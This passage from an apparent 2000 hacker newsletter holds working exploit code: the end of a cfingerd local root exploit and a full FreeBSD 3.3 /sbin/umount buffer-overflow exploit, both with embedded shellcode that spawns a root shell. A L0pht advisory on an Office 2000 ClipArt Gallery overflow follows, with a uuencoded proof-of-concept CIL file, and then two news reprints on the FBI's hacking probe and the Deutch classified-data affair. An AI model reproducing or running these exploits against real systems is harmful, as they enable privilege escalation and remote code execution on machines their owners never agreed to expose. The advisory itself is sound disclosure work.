              cli.sin_addr.s_addr=htonl(LOCALHOST);
              cli.sin_port = htons(FINGER);
      
              if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
              {
                      perror("socket");
                      return -1;
              }
      
              if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) 
              {
                      perror("connect");
                      return -1;
              }
      
              sprintf(sendbuf, "%.1023s\n", getenv("LOGNAME"));
              write(sockfd, sendbuf, strlen(sendbuf));
      
              sleep(1);
      
              fflush(stdout);
              fflush(stderr);
      
              sh(sockfd);
      
              return;
      }
      
      
      
      int main(argc, argv)
      int argc;
      char **argv;
      {
              char *buf1 = NULL, *buf2 = NULL, *p = NULL;
              u_long *addr_ptr = NULL;
              int noplen, i, bufsize = BUFFER_SIZE, addrs = ADDRS;
              int retofs = 0, ptrofs = 0;
              long ret, ptr;
              FILE *phile;
      
              char execshell[] = 
              "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
              "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
              "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff"SHELL"\x01\x01\x01\x01"
              "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
      
              fprintf(stderr, "\n"GREEN"babcia padlina ltd. cfingerd local root exploit"NORM UNBOLD"\n\n");
      
              if(argc > 5)
              {
                      bufsize = atoi(argv[1]);
                      addrs = atoi(argv[2]);
                      ptrofs = atoi(argv[3]);
                      retofs = atoi(argv[4]);
              }
      
              if(!(buf1 = malloc(bufsize+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              if(!(buf2 = malloc(addrs+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              ret = RET + ptrofs;
              ptr = PTR + ptrofs;
      
              noplen = bufsize - strlen(execshell);
              memset(buf1, NOP, noplen);
              strcat(buf1, execshell);
      
              p = buf2;
              addr_ptr = (unsigned long *)p;
      
              for(i = 0; i < (addrs / 4) /2; i++)
                      *addr_ptr++ = ptr;
      
              for(i = 0; i < (addrs / 4) /2; i++)
                      *addr_ptr++ = ret;
      
              p = (char *)addr_ptr;
              *p = '\0';
      
              if ((phile = fopen(FILE1, "w")) == NULL)
              {
                      perror("fopen()");
                      return -1;
              }
      
              fprintf(stderr, GREEN "RET:" RED "0x%x\n" GREEN "PTR:" RED "0x%x%\n\n" GREEN "setting up..." NORM UNBOLD "\n", ret, ptr);
      
              fprintf(phile, "#Changing user database information for %s.\n"
                      "Shell: %s\n"
                      "Full Name: %s\n"
                      "Office Location: %s\n"
                      "Office Phone: \n"
                      "Home Phone: \n"
                      "Other information: \n", 
                      getenv("LOGNAME"), getenv("SHELL"), buf2, buf1);
      
              fclose(phile);
      
              if ((phile = fopen(FILE2, "w")) == NULL)
              {
                      perror("fopen()");
                      return -1;
              }
      
              fprintf(phile, "cat user.inf>\"$1\"\n");
              fprintf(phile, "touch -t 2510711313 \"$1\"\n");
      
              fclose(phile);
      
              if ((phile = fopen(FILE3, "w")) == NULL)
              {
                      perror("fopen()");
                      return -1;
              }
      
              // buffer is too small to execute seteuid/setegid there, so we have
              // to do this here.
      
              fprintf(phile, "main() { seteuid(getuid()); setegid(getgid()); system(\"id\");  execl(\"/bin/sh\", \"sh\", 0); }");
              fclose(phile);
      
              system("/usr/bin/cc -o " SHELL " " FILE3);
      
              unlink(FILE3);
      
              system("EDITOR=./" FILE2 ";export EDITOR;chmod +x " FILE2 ";chfn > /dev/null 2>&1");
      
              unlink(FILE1);
              unlink(FILE2);
      
              if (connectto() < 0)
                      return -1;
      
              unlink(SHELL);
      
              return 0;
      }
      
      
      
      
      
      
      /*           =- passed thru infected network  -=         */
      /*           =-   http://infected.ilm.net/    -=         */
      
      
      
      @HWA            
      
164.0 FreeBSD 3.3-RELEASE /sbin/umount exploit.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://infected.ilm.net:8101/new.htm
      
      /*
      *
      * (c) 1999 babcia padlina ltd. <babunia@freebsd.lublin.pl>
      * FreeBSD 3.3-RELEASE /sbin/umount exploit.
      *
      */
      
      #include <stdio.h>
      #include <sys/param.h>
      #include <sys/stat.h>
      #include <string.h>
      
      #define NOP             0x90
      #define OFS             1800
      #define BUFSIZE         1024
      #define ADDRS           1200
      #define DIR             "babcia padlina ltd."
      
      long getesp(void)
      {
         __asm__("movl %esp, %eax\n");
      }
      
      int main(argc, argv)
      int argc;
      char **argv;
      {
              char *execshell =
              "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
              "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
              "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
              "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
      
              char *buf, *p;
              int noplen, i, ofs;
              long ret, *ap;
      
              if(!(buf = (char *)malloc(BUFSIZE+1)))
              {
                      perror("malloc()");
                      return -1;
              }
      
              if (argc > 1)
                      ofs = atoi(argv[1]);
              else
                      ofs = OFS;
      
              noplen = BUFSIZE - strlen(execshell);
              ret = getesp() + ofs;
      
              memset(buf, NOP, noplen);
              buf[noplen+1] = '\0';
              strcat(buf, execshell);
      
              setenv("EGG", buf, 1);
      
              if(!(buf = (char *)malloc(ADDRS+1)))      
              {
                      perror("malloc()");
                      return -1;
              }
      
              p = buf;
              ap = (unsigned long *)p;
      
              for(i = 0; i < ADDRS / 4; i++)
                      *ap++ = ret;
      
              p = (char *)ap;
              *p = '\0';
      
              fprintf(stderr, "RET: 0x%x  len: %d\n\n", ret, strlen(buf));
      
              chdir(getenv("HOME"));
              chmod(DIR, 0755);
              rmdir(DIR);
              mkdir(DIR, 0755);
              chdir(DIR);
              chmod(".", 0);
      
              execl("/sbin/umount", "umount", buf, 0);
      
              return 0;
      }
      
      
      /*           =- passed thru infected network  -=         */
      /*           =-   http://infected.ilm.net/    -=         */
      
      
      
      
      @HWA            
      
165.0 l0pht advisory 03/06/2000 ClipArt gallery overflow.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.l0pht.com/
            


      
                                    @Stake Inc.
                                L0pht Research Labs
                          www.atstake.com     www.L0pht.com
      
      
                                 Security Advisory       
      
             
              Advisory Name: ClipArt Gallery Overflow
          Advisory Released: 03/06/00
                Application: Microsoft Office 2000
                   Severity: An attacker can seize control of a Windows 95, 98, NT,
                             or 2000 machine via any HTML source, including 
                             Microsoft Outlook e-mail.
                     Status: Vendor patch available, workaround available
                     Author: dildog@l0pht.com
                        WWW: http://www.l0pht.com/advisories.html
                           
      
      Overview:
      
              ClipArt Gallery (CAG.EXE) that comes with Microsoft Office 2000
      processes ".CIL" files for installation of clipart from the Internet. The
      CIL format is not handled properly by CAG.EXE and one of the internal fields
      in the file presents a buffer overflow condition, allowing arbitrary code to
      be executed by an attacker. The attacker would place a malicious CIL file
      on a website, or in an email, causing the target to import the CIL file. The
      file will be opened without prompting as the CIL file format does not require 
      confirmation for open after download. This issue requires NO active scripting 
      to exploit, and is NOT regulated by Internet Explorer 'security zones'.
      
      
      Description:
      
              The ".CIL" file format is a compressed clip-art delivery format that
      takes a Windows Metafile (WMF) or other image, stores it compressed, and
      packages it with keywords and descriptive information. Amongst the various 
      fields in the CIL format are a few Unicode strings, one of which is the 
      filename to which the clipart is to be decompressed. If the filename specified 
      is extremely long, a stack overflow occurs after a Unicode to ANSI conversion, 
      copying the ANSI version of the buffer over the stack frame. 
      
              Unfortunately, the current fix for this issue is really only a
      bandaid to the problem that Internet Explorer is used -for everything-
      nowadays and that its HTML parser allows random file formats to be
      downloaded and parsed without confirmation in a number of cases. One can
      expect to see similar issues to this in the future.
      
      Vendor provided fix:
      
              Get your patch here:
      
            http://www.microsoft.com/technet/security/bulletin/ms00-015.asp
      
      
      Quick solution:
      
              One may wish to go through all of the file type associations and
      turn on the 'Confirm Open After Download' checkbox to ensure that suspect
      file types are not automatically executed without user intervention.
      
              To do this in Windows 2000, open up a standard Explorer window (such as 
      My Computer), and go to the Tools menu and choose "Folder Options". Under the 
      "File Types" tab, go to the "CIL" file type and click on it. Now press the
      "Advanced" button. You will notice that the checkbox "Confirm Open After Download"
      is unchecked. Check it, and then click OK.
      
      Exploit:
      
              This CIL file will create a harmless registry key when opened. The 
      registry key location is:
      
              HKLM\Software\Microsoft\Windows:dword,SMACK!=0x00000001
      
      This is proof of concept code only, but theoretically could be any executable
      code desired. This code works only on Windows 2000, but shifting around a
      few offsets yields code that works under Windows NT 4.0 and Win9X.
      
      
      <--- cut here --->
      
      begin 644 nt5.cil
      M4P!0`$P`20!4`$,`20!,`#,```"T$```U\W&F@``XO_B__H+^@M>`@````!/
      M50$`"0```T\(```#`#P!``````4````,`ML+VPL%````"P(`````!`````4!
      M`0`$````!`$-``0````&`0$`!`````(!`@`%`````0+___\`!````"X!&``(
      M````^@(`````````````!````"T!```%`````0+___\`!P```/P"````````
      M```$````+0$!``@```#Z`@```0`!```````$````+0$"``0```#P`0``.`$`
      M`"0#F@"=`H@!:@./`8@#AP&]`ZP!M`.2`:L#D@&/`W(!8P-^`;D"70'P`C@!
      M3@,``;$#T0`7!*@`@`2(`.L$<`!7!6$`Q059`.`%60#_!5D`_P4``(T%`P`=
      M!0X`K@0B`$$$/@#6`V$`;@.-``H#P`"J`OH`3@([`?@!@P&G`=$!7`$F`A<!
      M?P+9`-T"HP!``W0`I@-,``\$+0![!!4`Z@0&`%D%___*!?__X`54`.`%60!S
      M!6<`!@5^`)P$G``R!,,`RP/Q`&@#)P$(`V,!K0*F`5<"\`$&`AH"X`$8`N\!
      M%@(B`C\"*0(O`SL",0-?`CD#=P(]`Q,#1@.$`T\#N0-A`_4#<P,6!'X#*028
      M`VP$L0/'!,\#'07>`T<%\@-I!04$B04>!+8%&P3'!1T$U@4F!.`%X`7@!>`%
      MOP/3!;\#MP7&`Y0%VP.*!>,#<P7L`UP%!`1-!1T$/`4W!#`%E@0E!:P$+07=
      M!#4%[`1/!?H$7P4=!6P%005P!5$%7@5+!54%2`5`!40%-P4[!2X%,P48!2X%
      M"P4>!?L$&P7K!`X%R`3Z!+L$\`2>!,@$=@1_!%8$3`0L!"$$*@0#!"$$W@/>
      M`T,#U`,F`\(#Y0*Y`XD"X`-K`NP#60(*!'$"(`1E`EX$8`),!7\"3@6*`D$%
      MD0*#!'\"7@1@`B$$90):!*`"4`6G`F4%FP)L!7\"X`6'`N`%_P$J!)4!#@1O
      M`14$6P&S`V0!OP.'`;H#CP&T`Y(!O0.L`;\#GP'9`Z,!&`3F`04$\@'U`^$!
      MY`/6`<T#U@&]`\<!JP/*`94#PP&$`\8!;P._`5L#R0&=`H@!"````/H"```(
      M``@```````0````M`0``!````/`!`@`X`0``)0.:`)T"B`%J`X\!B`.'`;T#
      MK`&T`Y(!JP.2`8\#<@%C`WX!N0)=`?`".`%.`P`!L0/1`!<$J`"`!(@`ZP1P
      M`%<%80#%!5D`X`59`/\%60#_!0``C04#`!T%#@"N!"(`000^`-8#80!N`XT`
      M"@/``*H"^@!.`CL!^`&#`:<!T0%<`28"%P%_`MD`W0*C`$`#=`"F`TP`#P0M
      M`'L$%0#J!`8`607__\H%___@!50`X`59`',%9P`&!7X`G`2<`#($PP#+`_$`
      M:`,G`0@#8P&M`J8!5P+P`08"&@+@`1@"[P$6`B("/P(I`B\#.P(Q`U\".0-W
      M`CT#$P-&`X0#3P.Y`V$#]0-S`Q8$?@,I!)@#;`2Q`\<$SP,=!=X#1P7R`VD%
      M!02)!1X$M@4;!,<%'036!28$X`7@!>`%X`6_`],%OP.W!<8#E`7;`XH%XP-S
      M!>P#7`4$!$T%'00\!3<$,`66!"4%K`0M!=T$-07L!$\%^@1?!1T%;`5!!7`%
      M405>!4L%505(!4`%1`4W!3L%+@4S!1@%+@4+!1X%^P0;!>L$#@7(!/H$NP3P
      M!)X$R`1V!'\$5@1,!"P$(00J!`,$(03>`]X#0P/4`R8#P@/E`KD#B0+@`VL"
      M[`-9`@H$<0(@!&4"7@1@`DP%?P).!8H"0061`H,$?P)>!&`"(01E`EH$H`)0
      M!:<"906;`FP%?P+@!8<"X`7_`2H$E0$.!&\!%01;`;,#9`&_`X<!N@./`;0#
      MD@&]`ZP!OP.?`=D#HP$8!.8!!03R`?4#X0'D`]8!S0/6`;T#QP&K`\H!E0/#
      M`80#Q@%O`[\!6P/)`9T"B`$(````^@(```$``0``````!````"T!`@`$````
      M\`$``(X````D`T4`_P6)`M$&H@+<!L<"]`;9`CX'\P([!PT#&`>G`P@'X0/W
      M!B($]P9L!/<&L`3P!LP$YP;J!-P&#`7.!A$%Q`8<!;@&*P6N!BT%I`8T!9T&
      M0P64!DD%B@9,!74&505Z!BL%B`8*!84&[@2,!L8$CP:3!(4&:@1\!B\$9P8-
      M!&P&``1L!NP#3`;&`_\%O@/_!>`%:`?@!5H'R@5L!Y8%E`<D!:,'P`2Z!Q8$
      MN0?>`Z8'3@.L!]4"IP>S`J,'J0+'!ZL"S`?%`J<'LP*L!]4"T`?T`N('YP+@
      M!Z`"G`BS`NP(N0+G"*`"D0B=`MD'=`+`!WH"F@=U`HH'7P)^!U`"6P=!`B\'
      M0@(8!RP"[@8\`O\%!`+_!8D""````/H"```(``@```````0````M`0``!```
      M`/`!`@".````)0-%`/\%B0+1!J("W`;'`O0&V0(^!_,".P<-`Q@'IP,(!^$#
      M]P8B!/<&;`3W!K`$\`;,!.<&Z@3<!@P%S@81!<0&'`6X!BL%K@8M!:0&-`6=
      M!D,%E`9)!8H&3`5U!E4%>@8K!8@&"@6%!NX$C`;&!(\&DP2%!FH$?`8O!&<&
      M#01L!@`$;`;L`TP&Q@/_!;X#_P7@!6@'X`5:!\H%;`>6!90')`6C!\`$N@<6
      M!+D'W@.F!TX#K`?5`J<'LP*C!ZD"QP>K`LP'Q0*G![,"K`?5`M`']`+B!^<"
      MX`>@`IP(LP+L"+D"YPB@`I$(G0+9!W0"P`=Z`IH'=0**!U\"?@=0`EL'00(O
      M!T("&`<L`NX&/`+_!00"_P6)`@@```#Z`@```0`!```````$````+0$"``0`
      M``#P`0``8````"0#+@#_!5D`_P4``&X&!@#>!A0`30<J`+D'2``C"&X`B@B<
      M`.T(T0!,"0X!I@E2`?L)G`%*"NP!DPI!`M4*G`(1"_P"10M@`W(+QP.7"S$$
      MM`N>!,@+#075"WT%V@O\!8X+_`6."^`%B@N(!7X+&P5I"[`$3`M&!"<+WP/Z
      M"GL#Q@H:`XL*O@))"F8"``H5`K()R`%="8(!!`E#`:8("@%$"-D`W@>P`'8'
      MC@`,!W0`H`9C`#(&6@#_!5D`"````/H"```(``@```````0````M`0``!```
      M`/`!`@!@````)0,N`/\%60#_!0``;@8&`-X&%`!-!RH`N0=(`",(;@"*")P`
      M[0C1`$P)#@&F"5(!^PF<`4H*[`&3"D$"U0J<`A$+_`)%"V`#<@O'`Y<+,02T
      M"YX$R`L-!=4+?07:"_P%C@O\!8X+X`6*"X@%?@L;!6D+L`1,"T8$)PO?`_H*
      M>P/&"AH#BPJ^`DD*9@(`"A4"L@G(`5T)@@$$"4,!I@@*`40(V0#>![``=@>.
      M``P'=`"@!F,`,@9:`/\%60`(````^@(```$``0``````!````"T!`@`$````
      M\`$``(P````D`T0`;P?\!?\%_`7_!90+\064"_$%V@LG!MH+EP;1"P8'P`MT
      M!Z<+X`>&"TD(70NN""P+$`GT"FT)M0K%"6\*&`HC"F4*T0FL"GD)[`H<"24+
      MNPA6"U8(@`OM!Z(+@@>\"Q4'S@NE!M<+-0;:"_P%C@O\!8X+'@:&"XP&=POY
      M!E\+8P<_"\P'%PLR".@*E0BQ"O0(<PI/"2X*I`GC"?0)D@D^"CP)@0KA"+X*
      M@0CT"AX((@OP!S,+[P<3"]8'Q@K2!YX*R0=L"K4')0JO!P<*I@?>"8P'GPE^
      M!XP)>0<="7X'#0EZ!_,(?@??"($'D@B(!R<(A@?=!VL'-0=U!^,&<@>A!F@'
      M6`9W!R(&>0</!F\'_`4(````^@(```@`"```````!````"T!```$````\`$"
      M`(P````E`T0`;P?\!?\%_`7_!90+\064"_$%V@LG!MH+EP;1"P8'P`MT!Z<+
      MX`>&"TD(70NN""P+$`GT"FT)M0K%"6\*&`HC"F4*T0FL"GD)[`H<"24+NPA6
      M"U8(@`OM!Z(+@@>\"Q4'S@NE!M<+-0;:"_P%C@O\!8X+'@:&"XP&=POY!E\+
      M8P<_"\P'%PLR".@*E0BQ"O0(<PI/"2X*I`GC"?0)D@D^"CP)@0KA"+X*@0CT
      M"AX((@OP!S,+[P<3"]8'Q@K2!YX*R0=L"K4')0JO!P<*I@?>"8P'GPE^!XP)
      M>0<="7X'#0EZ!_,(?@??"($'D@B(!R<(A@?=!VL'-0=U!^,&<@>A!F@'6`9W
      M!R(&>0</!F\'_`4(````^@(```$``0``````!````"T!`@`$````\`$``(@`
      M```D`T(`*03\!3X$*P8_!%4&/P2N!D\$U0:4!+4'K@08",,$90C&!(H(P02M
      M",@$O`C5!-$(P03N"+($(@FI!&T)B00-"G\$EPIT!-`*:P3N"FT$*0MB!%H+
      M\`,T"XL#"0LJ`]8*S0*<"G0"7`HA`A4*U`''"8P!=`E+`1P)$0&^"-\`7@BS
      M`/D'D`"1!W4`)P=B`+L&5P!.!E4`_`54`.`%___@!0$`.@8+`*H&'0`9!S<`
      MAP=9`/('A`!:"+8`OPCO`"`)+P%]"78!U`G#`28*%P)R"F\"N`K-`O<*+@,O
      M"Y0#7PO]`X@+:02H"]8$P0M&!=$+M@7:"_$%V@OQ!90+X`64"^`%_`4I!/P%
      M"````/H"```(``@```````0````M`0``!````/`!`@"(````)0-"`"D$_`4^
      M!"L&/P15!C\$K@9/!-4&E`2U!ZX$&`C#!&4(Q@2*",$$K0C(!+P(U031",$$
      M[@BR!"()J01M"8D$#0I_!)<*=`30"FL$[@IM!"D+8@1:"_`#-`N+`PD+*@/6
      M"LT"G`IT`EP*(0(5"M0!QPF,`70)2P$<"1$!O@C?`%X(LP#Y!Y``D0=U`"<'
      M8@"[!E<`3@95`/P%5`#@!?__X`4!`#H&"P"J!AT`&0<W`(<'60#R!X0`6@BV
      M`+\([P`@"2\!?0EV`=0)PP$F"A<"<@IO`K@*S0+W"BX#+PN4`U\+_0.("VD$
      MJ`O6!,$+1@71"[8%V@OQ!=H+\064"^`%E`O@!?P%*03\!0@```#Z`@```0`!
      M```````$````+0$"``0```#P`0``#@```"0#!0!5`/P%5`#@!28$X`4I!/P%
      M50#\!0@```#Z`@``"``(```````$````+0$```0```#P`0(`#@```"4#!0!5
      M`/P%5`#@!28$X`4I!/P%50#\!0@```#Z`@```0`!```````$````+0$"``0`
      M``#P`0``#@```"0#!0#@!;\#X`6'`O\%B0+_!;X#X`6_`P@```#Z`@``"``(
      M```````$````+0$```0```#P`0(`#@```"4#!0#@!;\#X`6'`O\%B0+_!;X#
      MX`6_`P@```#Z`@```0`!```````$````+0$"``0```#P`0``#@```"0#!0#@
      M!?\!X`59`/\%60#_!00"X`7_`0@```#Z`@``"``(```````$````+0$```0`
      M``#P`0(`#@```"4#!0#@!?\!X`59`/\%60#_!00"X`7_`0@```#Z`@```0`!
      M```````$````+0$"``0```#P`0``#@```"0#!0!O!_P%:`?@!8X+X`6."_P%
      M;P?\!0@```#Z`@``"``(```````$````+0$```0```#P`0(`#@```"4#!0!O
      M!_P%:`?@!8X+X`6."_P%;P?\!0,``````&8`9@!F`&8`9@!F`&8`9@!F`&8`
      M9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F
      M`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`
      M9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F
      M`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`
      M9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F
      M`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`
      M9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F`&8`9@!F
      M`&8`2P!^`'T`9P!!`$$`00`M`"T`+0`M`"T`9@!F`)``ZP`6`"P`$`!]`&<`
      M*``0`'T`9P`D`!``?0!G`!@`[P"_`/\`D`"0`)``D`#K``4`Z`#Y`/\`_P#_
      M`%X`@0#&`.4`_P#_`/\`D`"0`)``5@!8`($`Z`!\`/\`_P#_`%``]@`0`$``
      M9@"!`#@``P`#`'4`]@!?`)``D`#_`#8`60!6`%<`N`#]`/\`_P!_`/<`T`!0
      M`/\`$0"0`/\`-@!:`)``,P#)`$D`,P#``/(`K@"0`#,`R0`"``\`40!'`%<`
      M`P#Y`)``N`#\`/\`_P#_`/<`V`!0`#,`P`!0`%<`4@`#`$8`!`#_`!``5@`#
      M`$8`"`#_`!``4``S`,```P!&``P`]P#8`/\`$`"0`*P`L`"Y`*L`J`"^`*T`
      MN@"C`+(`M@"\`*T`L`"L`+``N0"K`*,`J`"V`+$`NP"P`*@`K`#_`/L`_@#_
      M`/\`_P"L`+(`O@"\`+0`W@#_``,``P`#`&8`9@!F`&8`9@!F````9@!F`&8`
      M9@!F`&8`9@```&8`9@!F`&8`9@!F`&8```!F`&8`9@!F`&8`9@!F`&8`9@!F
      )`&8`9@``````
      `
      end
      
      <--- cut here --->
      
      
      dildog@l0pht.com 
      
        [ For more advisories check out http://www.l0pht.com/advisories.html ]
                                               L-ZERO-P-H-T
      
      
      @HWA
      
166.0 ISN:FBI views hackers as 'racketeers'
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.apbnews.com/newscenter/internetcrime/2000/02/16/hackers0216_01.html

      WASHINGTON (AP) [2.16.00] -- The nation's top law enforcement
      officials today described "fast-developing leads" in finding the
      electronic vandals who shut down major Internet sites last week.
      
      But they also acknowledged serious challenges in the manhunt, saying
      the hackers were sophisticated enough to falsify their digital
      fingerprints. Attorney General Janet Reno said such a disguise
      technique "makes it difficult, and sometimes impossible, to hold the
      perpetrator criminally accountable."
      
      "I would simply say that we are taking the attacks very seriously and
      that we will simply do everything in our power to identify those
      responsible and bring them to justice," Reno told a Senate panel.
      
      FBI Director Louis J. Freeh, who also testified, said there were
      "fast-developing leads as we speak, and hopefully we can provide more
      details in coming days." He said FBI field offices in five cities have
      opened investigations into the attacks: Los Angeles, San Francisco,
      Atlanta, Boston and Seattle. More agents in other cities and overseas
      are also involved.
      
      A coordination problem
      
      Reno and Freeh also conceded important shortcomings in coordinating
      the myriad government agencies and public and private experts who help
      investigate high-tech crimes. "We're not doing so good," admitted
      Freeh, adding that cooperation was improving.
      
      The FBI also urged Congress today to consider expanding use of federal
      racketeering "RICO" laws -- traditionally used against the Mafia and
      drug cartels -- to apply against organized and persistent hackers. It
      also urged Congress to lower the $5,000 minimum in damages that victim
      companies must suffer before attackers can be prosecuted under federal
      computer crime laws.
      
      Freeh said lawmakers should consider "whether some of this activity,
      which goes beyond a single episode of fraud or hacking, gets into the
      realm of enterprise criminal activity."
      
      "RICO was intended to get gangsters," said Jennifer Granick, a
      California lawyer who has represented hackers. "Now, it's getting a
      bunch of kids in black concert T-shirts."
      
      Freeh said hackers in many of last week's attacks falsified the
      Internet addresses of the computers they used, "meaning that the
      address that appeared on the target's log was not the true address of
      the system that sent the messages."
      
      'An insidious, organized attack'
      
      EBay Inc. disclosed new details today about the Feb. 8 electronic
      assault launched against it, which shut down the world's largest
      online auction site for 90 minutes. Similar attacks disrupted other
      major commercial sites, including those of Yahoo, Amazon.com, Buy.Com,
      CNN and E*Trade.
      
      EBay's lawyer, Robert Chestnut, described an "insidious, organized
      attack" that was "obviously well planned." The attackers flooded
      eBay's site with 10 times its normal incoming data, transmitting a
      specific type of information identical to that used against Yahoo on
      Feb. 7.
      
      Chestnut told the Appropriations Subcommittee on Commerce, Justice,
      State and Judiciary that eBay also was attacked the evening of Feb. 9,
      but engineers were able to repel the second attack quickly.
      
      The FBI is contacting several hackers, known by their online
      nicknames. The bureau would not say whether its agents have talked
      with any suspects, but it appeared some interviews have begun, hacker
      sources said.
      
      Transportation Department sites hit
      
      The testimony from Reno and Freeh followed President Clinton's meeting
      Tuesday with technology experts about ways to improve Internet
      security. Participants said that during the talks, industry leaders
      urged the government to lead by example by making its computer systems
      secure.
      
      But overnight Tuesday, a hacker vandalized at least four Web sites at
      the Transportation Department, including the page for the agency's
      information officer, George Molaski. Those attacks were first noted by
      Attrition.Org, acomputer security Web site that records such hacks.
      
      The computer breached by the hacker "was in the process of being
      fixed," Molaski said today. "Unfortunately, they got to it before we
      closed that door. It was a relatively simple vulnerability."
      
      Also today, House Commerce Chairman Tom Bliley, R-Va., criticized
      "highly vulnerable" computers at the Environmental Protection Agency
      (EPA), urging it to shut down its Internet connection immediately,
      citing an unreleased report by the General Accounting Office.
      
      EPA spokesman David Cohen said the agency has no plans to disable
      Internet access, adding that experts there have taken steps to
      strengthen security of computers with sensitive information.
      
      
      
      ---------------------------------------------------
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred. M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *=================================================*
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA
      
167.0 ISN:Pentagon probe targets Deutch
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: ISN Mailing list
      
      http://www.washtimes.com/national/news1-02172000.htm
      
      (The Washington Times) [2.17.00] The Pentagon is investigating whether
      ultrasecret "black programs" were compromised by former CIA Director
      John Deutch after he put details about some of the Defense
      Department's most sensitive activities on his home computers.
      
      Defense and intelligence officials said the Pentagon recently set up a
      special panel to examine a personal diary containing highly classified
      defense information that was kept improperly on Mr. Deutch's home
      computers desktop and laptop systems that were used to access the
      Internet and had received e-mail messages from abroad.
      
      The CIA, meanwhile, launched a "damage assessment" to determine
      whether its secrets were compromised by Mr. Deutch, who was CIA
      director from 1995 to 1996.
      
      The CIA withheld information from the Pentagon about what are known as
      "special access programs" for more than a year and only provided it
      after news reports highlighted the security breach earlier this month.
      
      Special-access programs are so secret that officials privy to them are
      authorized to lie to keep them from becoming public. Most are kept
      secret from the CIA and only disclosed to the Pentagon's top three or
      four officials.
      
      Mr. Deutch was briefed on many of these programs when he was
      undersecretary of defense for acquisitions and later deputy secretary
      of defense from 1993 to May 1995, when he became CIA director. Most of
      the programs have been ongoing for the past seven years.
      
      Rear Adm. Craig Quigley, a Pentagon spokesman, said a team of defense
      security officials was set up 10 days ago to review the material first
      uncovered in Mr. Deutch's diary by CIA security officials in January
      1997.
      
      Adm. Quigley said a damage assessment could result from the
      investigation but that none had been launched yet. "Let's just see
      what we find," he said.
      
      An intelligence official said the information on the black programs
      "was in some ways even more sensitive than the CIA" secrets kept on
      the home computers. The CIA information included details of agency
      covert action programs.
      
      Among the black programs currently under way are efforts to develop
      new weapons and methods of warfare, including electronic "information
      warfare" and how the U.S. military plans to conduct it in the future.
      They also include highly sensitive intelligence and collection
      development programs for future operations.
      
      That information is known to be a major target of foreign intelligence
      services from Russia, China and other nations.
      
      Other defense officials said privately the fact that details of
      special-access programs were kept on computers that are not secure is
      a security breach because of the sensitive nature of the programs.
      
      They said both Defense Secretary William S. Cohen and Deputy Defense
      Secretary John Hamre have resisted calls from officials involved in
      the programs to conduct a damage assessment. They did not say why.
      
      However, the Senate Select Committee on Intelligence is investigating
      whether the CIA covered up the Deutch affair to protect the nation's
      top intelligence official from punishment for mishandling secrets.
      
      Mr. Deutch declined to comment through his lawyer, Terry O'Donnell.
      
      The CIA recently launched a damage assessment of whether its secrets
      were compromised by Mr. Deutch's use of home computers to keep highly
      sensitive information after leaving the agency in December 1996, an
      intelligence official said.
      
      According to officials who have seen an inspector general report on
      the matter, the home computers were not secured and had been used to
      access pornographic Internet sites by someone in Mr. Deutch's
      household. Investigators also found that one of Mr. Deutch's computers
      had received an e-mail message from a Russian scientist living in
      Western Europe.
      
      In addition to the review team looking into the Deutch diary, Adm.
      Quigley said the Pentagon inspector general recently started an
      investigation into how the material ended up on four removable
      computer cards used by Mr. Deutch's Macintosh computers.
      
      "They're both ongoing," Adm. Quigley said of the investigations.
      
      In a related development, senior CIA officials failed to notify the
      Justice Department about possible criminal and ethical violations by
      Mr. Deutch shortly after the secrets were found on his home computer.
      
      CIA security officials uncovered "clear evidence" in early 1997 that
      Mr. Deutch may have violated three laws in using CIA-supplied home
      computers for personal use and for keeping and deleting secret
      information, said agency officials who spoke on the condition of
      anonymity.
      
      However, the Justice Department was never notified of the violations
      until months later.
      
      The FBI was first told about the security breach by Michael O'Neill,
      the CIA general counsel and friend of Mr. Deutch, in a telephone call.
      However, the FBI did not investigate the matter because there was no
      evidence of foreign government involvement, the officials said.
      
      When the Justice Department was notified in April 1998 of possible
      crimes, only one of the three laws was cited.
      
      A CIA official said senior agency managers deliberately focused on the
      possible disclosure of secrets to foreign powers because they knew
      those charges would not be pursued. The managers were not identified
      by name.
      
      "Nobody here ever claimed that he sold secrets to the Russians or even
      gave them anything," the official said. "Senior CIA officials knew
      nobody would prosecute him for that. . . . And the Justice Department
